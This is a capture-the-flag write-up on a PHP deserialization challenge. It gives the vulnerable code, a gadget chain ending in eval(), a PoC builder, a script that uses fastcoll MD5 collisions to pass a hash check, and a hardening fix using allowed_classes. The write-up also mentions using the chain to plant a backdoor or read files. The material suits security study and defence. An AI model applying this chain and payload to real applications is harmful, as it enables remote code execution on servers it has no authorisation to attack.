PHP Deserialization + MD5 Collision
2022-07-05 20:49:00 【Game programming】
Source code:

```php
<?php
error_reporting(0);
highlight_file(__FILE__);

class Backdoor {
    public $x;
    public $y;
    // Gadget 4: called when a Backdoor object is used as a function ($obj()).
    public function __invoke(){
        if( is_string($this->x) && is_string($this->y) && ($this->x != $this->y) && (md5($this->x) === md5($this->y)) ){
            if(!preg_match("/\<\?/", $this->x, $match)){
                eval($this->x);   // the sink: $x is executed as PHP code
            } else {
                die("No Way!");
            }
        } else {
            die("Keep it up......");
        }
    }
}

class Entrance{
    public $name;
    public $str;
    public function __construct(){
        $this->name = "Bunny";
    }
    // Gadget 2: reads a property of whatever object $str holds.
    public function __toString(){
        return $this->str->name;
    }
    // Gadget 1: runs automatically after unserialize() restores the object;
    // the concatenation converts $name to a string.
    public function __wakeup(){
        echo 'Welcome, '.$this->name."<br>";
    }
}

class Test{
    public $z;
    public function __construct(){
        $this->z = array();
    }
    // Gadget 3: reached when an inaccessible or undefined property is read.
    public function __get($key){
        $function = $this->z;
        return $function();
    }
}

if (isset($_GET['poc'])){
    unserialize($_GET['poc']);   // entry point: attacker-controlled serialized data
}
?>
```
Analysis:
First, the unserialize() call on $_GET['poc'] makes it obvious that this is a PHP deserialization problem. The usual approach is to find the entry point first: a magic method that PHP calls on its own while unserialize() rebuilds an object.
Reading the code, the first one that stands out is __wakeup() in the Entrance class.
__wakeup():
unserialize() checks whether the class declares a __wakeup() method. If it does, the method is called automatically once the object's properties have been restored.
The method here only echoes a greeting, but look closely: it concatenates 'Welcome, ' with $this->name, and right above it the same class defines __toString().
__toString():
The method PHP calls when an object is used where a string is expected, for example echo $obj; or a string concatenation.
So if $name holds an object instead of the string "Bunny", the concatenation inside __wakeup() triggers that object's __toString(). Pointing $name at the Entrance object itself (a self-reference, which serialize() writes as r:1;) is the simplest way to do that.
Now look at what __toString() does: it returns $this->str->name, i.e. it reads a property called name from whatever object is stored in $str. If $str holds an object whose class declares __get(), and the name property is not accessible from Entrance, that read goes through __get().
Looking back at the source, the Test class has exactly that: a __get() method.
__get():
PHP calls __get($key) when code reads a property that is inaccessible from the caller's scope (private or protected) or does not exist at all. It is commonly used to expose private members in a controlled way, which is why a class that was never meant to be deserialized may still carry one.
Combining the steps: give Test a private $name property (leaving name undeclared works just as well; either way Entrance::__toString() is not allowed to read it directly), and the access $this->str->name lands in Test::__get().
Look at the body of __get(): it stores $this->z in $function and returns $function(). Calling a variable as a function is how PHP invokes a closure, but it also works for any object whose class defines __invoke(). Checking the code again, Backdoor defines one.
__invoke():
__invoke() is the method PHP calls when an object is called as if it were a function, i.e. $obj().
Effect: when an object is used as a function, __invoke() runs automatically.
Note: this feature exists only in PHP 5.3.0 and later.
__invoke() applies some filtering: $x and $y must both be strings, they must differ ($x != $y), and their md5() digests must be equal. Because the digests are compared with ===, the well-known "0e..." magic-hash trick (which relies on loose == comparison of digest strings) does not help here; a genuine MD5 collision is required. If the check passes and $x does not contain "<?", $x is handed to eval() and executed as PHP code, which is the primitive we want in the end.
That is the whole chain: unserialize() -> Entrance::__wakeup() -> Entrance::__toString() -> Test::__get() -> Backdoor::__invoke() -> eval(). If it is hard to see forward, work backwards instead: start from the dangerous sink (eval), find what can reach it, and keep going until you arrive at the entry point.
Answer:
Construct the PoC chain:

```php
<?php
// Only the property names matter for serialize(), so the classes are
// redeclared here without their methods.
class Entrance{
    public $name;
    public $str;
}
class Test{
    public $z;
    private $name;   // serialized with a "\0Test\0name" key (contains null bytes)
}
class Backdoor {
    public $x;
    public $y;
}
$a=new Entrance();
$b=new Test();
$c=new Backdoor();
$a->name=$a; // self-reference (r:1;), used to trigger __toString from __wakeup
$a->str=$b;  // used to trigger __get
$b->z=$c;    // used to trigger __invoke
$c->x=file_get_contents("1_msg1.txt");  // the two fastcoll outputs
$c->y=file_get_contents("1_msg2.txt");
echo urlencode(serialize($a));
// The plain-text output contains invisible characters (the null bytes in the
// private property name and the binary collision blocks), so remember to
// URL-encode it before putting it in the poc parameter.
?>
```
The chain itself is not hard: three assignments and it is done. The difficult part of this challenge is the MD5 requirement at the end. Finding two strings with the same MD5 is easy enough, but these strings also have to pass through eval() as PHP code, which is less obvious.
Trying candidates by hand is hopeless; this is what the tool fastcoll is for.
Download resources
Program: http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
Source code: http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
Given a prefix, fastcoll produces two files that both start with that prefix, differ from each other only in the appended collision blocks, and have the same MD5 digest. With this tool the challenge becomes simple.
As a quick test, make the PHP code print 999999.
First prepare 1.txt with the content:
echo 999999;
Drag the file onto fastcoll.exe (the command-line equivalent is fastcoll -p 1.txt -o 1_msg1.txt 1_msg2.txt) and the program generates two output files.
Looking at them, the code is followed by a run of garbage bytes, which eval() would reject as a parse error. So append a line comment to the original file, so that the collision bytes are commented out. 1.txt becomes:
echo 999999;//
Run it through fastcoll again and both generated files start with echo 999999;// and end with the collision bytes. Because those bytes are binary, read the files with file_get_contents() instead of pasting them into the script. Two caveats: a // comment ends at the first newline, so if a 0x0A byte lands in the collision bytes of the file used as $x, eval() chokes on whatever follows; and a ?> would also end the comment (harmless, it only echoes the remaining bytes). Only the file used as $x is evaluated, and the appended bytes are effectively random, so swap the two files or regenerate until the one used as $x is clean. The server's "<?" filter is worth checking for the same reason.
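The following script is an added example and is not part of the original writeup. It checks a fastcoll output pair for the conditions Backdoor::__invoke() and the // comment trick impose (same MD5, different bytes, shared prefix, no "<?", no newline in the bytes that follow the prefix), picks whichever ordering of the two files works as ($x, $y), and then builds the URL-encoded PoC. The file names 1_msg1.txt and 1_msg2.txt and the prefix echo 999999;// are taken from the steps above; the class stubs are the same property-only copies the PoC uses.

```php
<?php
// Added example (not from the original writeup): sanity-check a fastcoll output
// pair before using it in the chain, then build the PoC parameter.
// Assumed inputs: 1_msg1.txt / 1_msg2.txt generated from a 1.txt that contains
// exactly the prefix "echo 999999;//".

class Entrance { public $name; public $str; }
class Test     { public $z; private $name; }
class Backdoor { public $x; public $y; }

// Returns a list of problems for using $x as the eval()'d string and $y as the
// partner; an empty list means the pair passes every check the server applies.
function check_collision_pair(string $x, string $y, string $prefix): array {
    $problems = [];
    if ($x === $y) {
        $problems[] = 'files are identical, the $x != $y check would fail';
    }
    if (md5($x) !== md5($y)) {
        $problems[] = 'MD5 digests differ, this is not a collision';
    }
    if (strncmp($x, $prefix, strlen($prefix)) !== 0) {
        $problems[] = '$x does not start with the expected prefix';
    }
    if (preg_match('/\<\?/', $x)) {
        $problems[] = '$x contains "<?", the server would die("No Way!")';
    }
    // Bytes after the prefix are the collision blocks. A 0x0A byte ends the
    // "//" comment early and the rest is parsed as PHP, so it must be absent.
    $tail = substr($x, strlen($prefix));
    if (strpos($tail, "\n") !== false) {
        $problems[] = 'newline inside the collision bytes of $x, regenerate or swap';
    }
    return $problems;
}

// Try both orderings: only $x is eval()'d, so a newline in one file is fine
// as long as that file is used as $y.
function usable_order(string $m1, string $m2, string $prefix): ?array {
    foreach ([[$m1, $m2], [$m2, $m1]] as [$x, $y]) {
        if (check_collision_pair($x, $y, $prefix) === []) {
            return [$x, $y];
        }
    }
    return null;
}

function build_poc(string $x, string $y): string {
    $a = new Entrance();
    $b = new Test();
    $c = new Backdoor();
    $a->name = $a;   // serialized as r:1; -> __wakeup's concatenation hits __toString
    $a->str  = $b;   // __toString reads $this->str->name -> Test::__get
    $b->z    = $c;   // __get calls $this->z() -> Backdoor::__invoke
    $c->x = $x;
    $c->y = $y;
    // urlencode() is required: the private property key and the collision
    // blocks contain null and other non-printable bytes.
    return urlencode(serialize($a));
}

$prefix = "echo 999999;//";
$m1 = file_get_contents('1_msg1.txt');
$m2 = file_get_contents('1_msg2.txt');
if ($m1 === false || $m2 === false) {
    fwrite(STDERR, "could not read the fastcoll output files\n");
    exit(1);
}
$order = usable_order($m1, $m2, $prefix);
if ($order === null) {
    fwrite(STDERR, implode("\n", check_collision_pair($m1, $m2, $prefix)) . "\n");
    exit(1);
}
[$x, $y] = $order;
echo build_poc($x, $y), "\n";
```

Run it next to the two fastcoll outputs; a non-zero exit with the reasons on stderr means regenerate the pair, otherwise the printed string goes straight into the poc parameter.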
Test result (screenshot not reproduced here):
eval() runs the payload and 999999 is printed. From here the same chain can be used to leave a backdoor or to read files directly.
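Since the root cause is unserialize() instantiating whatever class name the client writes into the payload, here is the corresponding fix as an added example (not part of the original writeup). It assumes, purely for illustration, that this endpoint only ever needs plain arrays or scalars from the client; the Entrance class is the page's first gadget, reduced to the two methods that start the chain.

```php
<?php
// Added example (not from the original writeup): the same entry point with
// unserialize() told not to instantiate any class.
// Assumption for illustration: the endpoint only expects array data.

class Entrance {
    public $name;
    public $str;
    public function __toString() { return $this->str->name; }
    public function __wakeup()   { echo 'Welcome, ' . $this->name . "<br>"; }
}

// Before: any class that is defined (or autoloadable) can be instantiated from
// the payload, and its __wakeup()/__toString()/__get()/__invoke() run.
function load_vulnerable(string $data) {
    return unserialize($data);
}

// After: with allowed_classes => false every object in the payload becomes a
// __PHP_Incomplete_Class, which has no magic methods, so no gadget chain can
// start. Anything that is not the expected array shape is rejected as well
// (false from malformed input is covered by the is_array check).
function load_hardened(string $data): ?array {
    $v = @unserialize($data, ['allowed_classes' => false]);
    return is_array($v) ? $v : null;
}

// Constructed payload: the first stage of the writeup's chain, an Entrance
// whose $name is a self-reference (r:1;).
$poc = 'O:8:"Entrance":2:{s:4:"name";r:1;s:3:"str";N;}';

// The hardened loader refuses the object payload outright, and no
// "Welcome," line is ever printed because __wakeup() is never reached.
var_dump(load_hardened($poc));

// Showing why: the decoded value is an incomplete-class placeholder,
// not an Entrance instance.
$o = @unserialize($poc, ['allowed_classes' => false]);
var_dump($o instanceof __PHP_Incomplete_Class);

// Legitimate array data still round-trips through the hardened loader.
var_dump(load_hardened('a:1:{s:1:"k";s:1:"v";}'));
```

The allowed_classes option exists since PHP 7.0; pass false rather than a list unless a specific class genuinely has to be restored, and for data that comes from the client prefer json_decode() over serialize()/unserialize() altogether, since JSON has no way to name a class.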
author :Sentry_fei